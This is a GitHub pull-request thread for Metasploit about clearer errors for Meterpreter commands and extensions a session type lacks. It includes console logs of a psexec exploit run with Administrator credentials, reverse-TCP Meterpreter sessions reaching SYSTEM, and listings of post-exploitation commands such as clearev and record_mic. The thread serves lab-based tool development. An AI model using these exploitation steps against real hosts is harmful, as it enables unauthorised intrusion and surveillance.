Better Handling For Incompatible Meterpreter Extensions and Commands

[zeroSteiner]

This requires rapid7/metasploit-payloads#451 to be landed first and the gem to be bumped.

This makes a number of changes to offer better handling for Meterpreter extensions and commands that are incompatible with a particular session. This for example will handle when the user attempts to migrate using a Python Meterpreter, or load the kiwi extension on the PHP Meterpreter. Currently in both of these cases, the user will get an error basically implying that Metasploit has no idea what that command or extension is. This could easily confuse someone less familiar with Metasploit that may not realize that migrate isn't supported on all Meterpreters, or that not all Meterpreters have the same extensions. With these changes in place, the user will get a more descriptive error message stating that the command¹ or extension is incompatible with the current session type (which is printed in the output to make our jobs easier when troubleshooting issues opened by users).

One of the major changes made to facilitate this is to enumerate the command IDs that are supported by the Meterpreter core since not all of them support all of the same core commands. With this in place, Metasploit is able to rely on Meterpreter informing it of which core commands it can handle and use that information to filter commands. This is a much better solution than the platform fingerprinting that is in place now. It is also how commands for extensions like stdapi are currently filtered. There's a good amount of code that was refactored in this PR to rely on the enumerated core commands instead of fingerprinting the platform which isn't super consistent.

This PR also updates the post/test/meterpreter module to incorporate a new test that ensures that the core command IDs can be enumerated as the extension ones can be.

¹ For a Meterpreter command to be reported as incompatible, the extension that provides it must have been loaded. For example, if a user attempts to run creds_all without loading kiwi, they'll still get an error that the command is unknown.

Testing

• Start msfconsole and run loadpath test/modules to load the test modules
• Use exploit/windows/smb/psexec and set the options to target a Windows system
• Use the AutoRunScript option to automatically run post/test/meterpreter
• Run it for both the 32-bit and 64-bit payloads, see no error messages
• Open a Python / Java / PHP Meterperter
• See that Windows-specific commands and extensions are not available (commands: migrate, ssl_verify, etc.) (extensions: python, kiwi, powershell, etc.)
• See that commands that are not supported do not appear in the help output and are not suggested for tab completion

Demo

In this example, the Python Meterpreter is used which lacks support for the migrate command and does not have the kiwi extension.

msf6 payload(python/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : localhost.localdomain
OS              : Linux 5.9.16-100.fc32.x86_64 #1 SMP Mon Dec 21 14:10:00 UTC 2020
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > migrate 1234
[-] The "migrate" command is not supported by this Meterpreter type (python/linux)
meterpreter > thisCommandDoesNotExist
[-] Unknown command: thisCommandDoesNotExist.
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/linux)
meterpreter > load thisExtensionDoesNotExist
Loading extension thisextensiondoesnotexist...
[-] Failed to load extension: No module of the name thisextensiondoesnotexist found
meterpreter > 

Fixes #14610

[zeroSteiner]

These changes here update these two methods to both return nil when the ID or name is unknown. Previously id would raise a RuntimeError and name would return a list. This allows them to be used to easily query whether or not the ID and name are valid which I was doing while experimenting with some ways to suggest extensions. The get_extension_module and get_extension_klass method both still raise RuntimeError when the name is invalid.

[zeroSteiner]

@msjenkins-r7 test this please.

[zeroSteiner]

I'm pretty sure that the sanity tests are failing because the required Windows Meterpreter binaries have not been included since the Windows side of things hasn't been merged yet.

[jmartin-tech]

@zeroSteiner, you are correct failure looks to be that old payloads are not compatible with this code. That suggests this is a breaking change for windows meterperter at this time. The code either needs to be able to account for both payloads or we should increment the version to represent that existing payloads will fail.

[zeroSteiner]

As a work around, I can put all the platform fingerprinting code back in and leverage that when the enumextcmd command doesn't return anything for the core on Windows. Then later on we can just cut that code out once another major breaking change has been made. Windows was the only one that needed changes so everything will work for the other Meterpreters and we should still get the proper error handling.

[zeroSteiner]

Commit b4005de should fix that by clearing the command requirements when the platform is Windows.

[gwillcox-r7]

PR to incorporate the changes needed to test this is now up at #14665. Once this is landed the Delayed label should be able to be removed and testing of this PR can proceed.

[gwillcox-r7]

PR should be ready to be tested now, just needs to rebase with upstream to pull in the metasploit-payloads 2.0.28 gem.

[gwillcox-r7]

Alright so some quick tests:

 ~/git/metasploit-framework │ land-pr14617:pr/14617 ⇣8⇡91 *1 ?12  ./msfconsole                                ✔ │ 9s │ 2.7.2 Ruby 
[-] No local database connected, meaning some Metasploit features will not be available. A full list of the affected features & database setup instructions can be found here: https://github.com/rapid7/metasploit-framework/wiki/msfdb:-Database-Features-&-How-to-Set-up-a-Database-for-Metasploit
[!] The following modules could not be loaded!../
[!] 	/home/gwillcox/git/metasploit-framework/modules/auxiliary/gather/office365userenum.py
[!] Please see /home/gwillcox/.msf4/logs/framework.log for details.
                                                  
 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


       =[ metasploit v6.0.30-dev-953f4a41ba               ]
+ -- --=[ 2099 exploits - 1128 auxiliary - 358 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Use sessions -1 to interact with the 
last opened session

msf6 > loadpath test/modules
Loaded 36 modules:
    13 auxiliary modules
    13 exploit modules
    10 post modules
msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.21.254.83
RHOSTS => 172.21.254.83
msf6 exploit(windows/smb/psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPASS *removed*
SMBPASS => *removed*
msf6 exploit(windows/smb/psexec) > set AutoRunScript post/test/meterpreter
AutoRunScript => post/test/meterpreter
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOSTS                172.21.254.83     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                                   no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               *removed*  no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.21.242.117   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.21.242.117:4444 
[*] 172.21.254.83:445 - Connecting to the server...
[*] 172.21.254.83:445 - Authenticating to 172.21.254.83:445 as user 'Administrator'...
[*] 172.21.254.83:445 - Selecting PowerShell target
[*] 172.21.254.83:445 - Executing the payload...
[+] 172.21.254.83:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 172.21.254.83
[*] Meterpreter session 2 opened (172.21.242.117:4444 -> 172.21.254.83:59053) at 2021-02-11 11:03:50 -0600

meterpreter > 
[*] Session ID 2 (172.21.242.117:4444 -> 172.21.254.83:59053) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 2
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.254.83 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting   Required  Description
   ----                  ---------------   --------  -----------
   RHOSTS                172.21.254.83     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT                 445               yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                     no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                    no        The service display name
   SERVICE_NAME                            no        The service name
   SHARE                                   no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                 no        The Windows domain to use for authentication
   SMBPass               *removed*  no        The password for the specified username
   SMBUser               Administrator     no        The username to authenticate as


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.21.242.117   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.21.242.117:4444 
[*] 172.21.254.83:445 - Connecting to the server...
[*] 172.21.254.83:445 - Authenticating to 172.21.254.83:445 as user 'Administrator'...
[*] 172.21.254.83:445 - Selecting PowerShell target
[*] 172.21.254.83:445 - Executing the payload...
[*] Sending stage (200262 bytes) to 172.21.254.83
[*] Meterpreter session 3 opened (172.21.242.117:4444 -> 172.21.254.83:59069) at 2021-02-11 11:04:42 -0600
[+] 172.21.254.83:445 - Service start timed out, OK if running a command or non-service executable...

meterpreter > 
[*] Session ID 3 (172.21.242.117:4444 -> 172.21.254.83:59069) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 3
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 20; Failed: 0

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

[gwillcox-r7]

Quick test with Java which shows that it now recognizes that we don't support getpid or migrate in Java Meterpreter:

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (java/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  172.21.254.83    no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.21.254.83:4444
[*] Sending stage (58147 bytes) to 172.21.254.83
[*] Meterpreter session 5 opened (0.0.0.0:0 -> 172.21.254.83:4444) at 2021-02-11 11:24:43 -0600
[*] Session ID 5 (0.0.0.0:0 -> 172.21.254.83:4444) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 5
[*] Session type is meterpreter and platform is windows
[+] should enumerate supported core commands
[+] should support 3 or more core commands
[*] Session doesn't implement getpid, skipping test
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[+] should return network routes
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[*] Passed: 19; Failed: 0

meterpreter > getuid
Server username: Administrator
meterpreter > background
[*] Backgrounding session 5...
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                      Information                      Connection
  --  ----  ----                      -----------                      ----------
  5         meterpreter java/windows  Administrator @ WIN-QKA9JKS5MVU  0.0.0.0:0 -> 172.21.254.83:4444 (172.21.254.83)

msf6 exploit(multi/handler) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > getpid
[-] The "getpid" command is not supported by this Meterpreter type (java/windows)
meterpreter > migrate
[-] The "migrate" command is not supported by this Meterpreter type (java/windows)
meterpreter > 

[gwillcox-r7]

Gah looks like python/meterpreter/reverse_tcp on a Windows 10 host running Python 3.9.1 is failing to pass the tests right now:

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.21.242.117   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > setg AutoRunScript post/test/meterpreter
AutoRunScript => post/test/meterpreter
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.21.242.117:4444 
[*] Sending stage (39324 bytes) to 172.21.254.83
[*] Meterpreter session 6 opened (172.21.242.117:4444 -> 172.21.254.83:59753) at 2021-02-11 11:40:36 -0600
[*] Session ID 6 (172.21.242.117:4444 -> 172.21.254.83:59753) processing AutoRunScript 'post/test/meterpreter'
[*] Running against session 6
[*] Session type is meterpreter and platform is windows
[-] FAILED: should enumerate supported core commands
[-] FAILED: should support 3 or more core commands
[+] should return its own process id
[+] should return a list of processes
[+] should return a user id
[+] should return a sysinfo Hash
[+] should return network interfaces
[+] should have an interface that matches session_host
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: Unknown error
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[+] should move files
[+] should copy files
[+] should do md5 and sha1 of files
[-] Passed: 18; Failed: 2

meterpreter > 

[gwillcox-r7]

Also I don't know if this helps but r.e above this is what I get on the compromised user's console:

C:\Users\Administrator\Desktop>python test-reverse-tcp-python.py
File not found - meterpreter-test
File not found - meterpreter-test-moved
File not found - meterpreter-test
File not found - meterpreter-test
File not found - meterpreter-test-copied

[gwillcox-r7]

On the plus side it seems most of the usual commands are now being marked as not supported by Python:

meterpreter > migrate
[-] The "migrate" command is not supported by this Meterpreter type (python/windows)
meterpreter > ssl_verify
[-] Unknown command: ssl_verify.
meterpreter > ssl_verify
[-] Unknown command: ssl_verify.
meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (python/windows)
meterpreter > load python
Loading extension python...
[-] Failed to load extension: The "python" extension is not supported by this Meterpreter type (python/windows)
meterpreter > load powershell
Loading extension powershell...
[-] Failed to load extension: The "powershell" extension is not supported by this Meterpreter type (python/windows)
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    show_mount    List all mount points/logical drives
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    getproxy      Display the current proxy configuration
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    resolve       Resolve a set of host names on the target


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getsid        Get the SID of the user that the server is running as
    getuid        Get the user that the server is running as
    kill          Terminate a process
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    pkill         Terminate processes by name
    ps            List running processes
    reg           Modify and interact with the remote registry
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    idletime      Returns the number of seconds the remote user has been idle


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

meterpreter >

[gwillcox-r7]

Quick confirmation that Java is working as expected minus the same potential case of ssl_verify coming up with unknown command vs unsupported.

meterpreter > load kiwi
Loading extension kiwi...
[-] Failed to load extension: The "kiwi" extension is not supported by this Meterpreter type (java/windows)
meterpreter > load python
Loading extension python...
[-] Failed to load extension: The "python" extension is not supported by this Meterpreter type (java/windows)
meterpreter > load powershell
Loading extension powershell...
[-] Failed to load extension: The "powershell" extension is not supported by this Meterpreter type (java/windows)
meterpreter > migrate
[-] The "migrate" command is not supported by this Meterpreter type (java/windows)
meterpreter > ssl_verify
[-] Unknown command: ssl_verify.
meterpreter > help

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bg                        Alias for background
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information or control active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    get_timeouts              Get the current session timeout values
    guid                      Get the session GUID
    help                      Help menu
    info                      Displays information about a Post module
    irb                       Open an interactive Ruby shell on the current session
    load                      Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    pry                       Open the Pry debugger on the current session
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    secure                    (Re)Negotiate TLV packet encryption on the session
    sessions                  Quickly switch to another session
    set_timeouts              Set the current session timeout values
    sleep                     Force Meterpreter to go quiet, then re-establish session
    transport                 Manage the transport mechanisms
    use                       Deprecated alias for "load"
    uuid                      Get the UUID for the current session
    write                     Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    checksum      Retrieve the checksum of a file
    cp            Copy source to destination
    del           Delete the specified file
    dir           List files (alias for ls)
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lls           List local files
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    mv            Move source to destination
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ifconfig      Display interfaces
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getuid        Get the user that the server is running as
    localtime     Displays the target system local date and time
    pgrep         Filter processes by name
    ps            List running processes
    shell         Drop into a system command shell
    sysinfo       Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command       Description
    -------       -----------
    keyevent      Send key events
    mouse         Send mouse events
    screenshare   Watch the remote user desktop in real time
    screenshot    Grab a screenshot of the interactive desktop


Stdapi: Webcam Commands
=======================

    Command       Description
    -------       -----------
    record_mic    Record audio from the default microphone for X seconds


Stdapi: Audio Output Commands
=============================

    Command       Description
    -------       -----------
    play          play a waveform audio file (.wav) on the target system

meterpreter >

Edit: I did however see some oddities with machine_id here:

meterpreter > machine_id
[-] core_machine_id: Operation failed: 1
meterpreter > getuid
Server username: Administrator
meterpreter > 

[gwillcox-r7]

Gah also seeing some other errors here as well:

meterpreter > screenshot
[-] Error running command screenshot: Rex::RuntimeError Could not determine Windows build number to determine if taking a screenshot is safe.
meterpreter > 

[gwillcox-r7]

Also seem to have encountered a bug when trying to tab complete load entries now which seems to result in hung sessions:

meterpreter > load [-] Session manipulation failed: No such file or directory @ dir_initialize - /home/gwillcox/.msf4/payloads/meterpreter ["/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `open'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `entries'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `meterpreter_enum_ext'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:88:in `block in list_meterpreter_extensions'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `each'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `list_meterpreter_extensions'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `block in cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `map'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:455:in `tab_complete_helper'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:414:in `block in tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:388:in `tab_complete'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:69:in `block in init_tab_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/readline.rb:136:in `readline_attempted_completion_function'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6329:in `gen_completion_matches'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6813:in `rl_complete_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6903:in `rl_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4374:in `_rl_dispatch_subseq'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4363:in `_rl_dispatch'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4779:in `readline_internal_charloop'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4853:in `readline_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:4875:in `readline'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:162:in `readline_with_output'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/input/readline.rb:100:in `pgets'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:321:in `get_input_line'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:141:in `run'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:583:in `_interact'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/interactive.rb:51:in `interact'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1545:in `cmd_sessions'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:223:in `cmd_exploit'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:543:in `run_command'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:492:in `block in run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:486:in `run_single'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'", "/home/gwillcox/git/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'", "./msfconsole:23:in `<main>'"]
msf6 exploit(multi/handler) > sessions -i 8
[*] Starting interaction with 8...


getuid
^C[-] sessions: Interrupted
msf6 exploit(multi/handler) > 

[gwillcox-r7]

Also seem to have encountered a bug when trying to tab complete load entries now which seems to result in hung sessions:

meterpreter > load [-] Session manipulation failed: No such file or directory @ dir_initialize - /home/gwillcox/.msf4/payloads/meterpreter ["/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `open'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `entries'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:129:in `meterpreter_enum_ext'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:88:in `block in list_meterpreter_extensions'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `each'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/metasploit-payloads-2.0.28/lib/metasploit-payloads.rb:86:in `list_meterpreter_extensions'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `block in cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `map'", "/home/gwillcox/git/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1334:in `cmd_load_tabs'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:455:in `tab_complete_helper'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:414:in `block in tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `each'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:403:in `tab_complete_stub'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:388:in `tab_complete'", "/home/gwillcox/git/metasploit-framework/lib/rex/ui/text/shell.rb:69:in `block in init_tab_complete'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/readline.rb:136:in `readline_attempted_completion_function'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6329:in `gen_completion_matches'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6813:in `rl_complete_internal'", "/home/gwillcox/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/rb-readline-0.5.5/lib/rbreadline.rb:6903:in 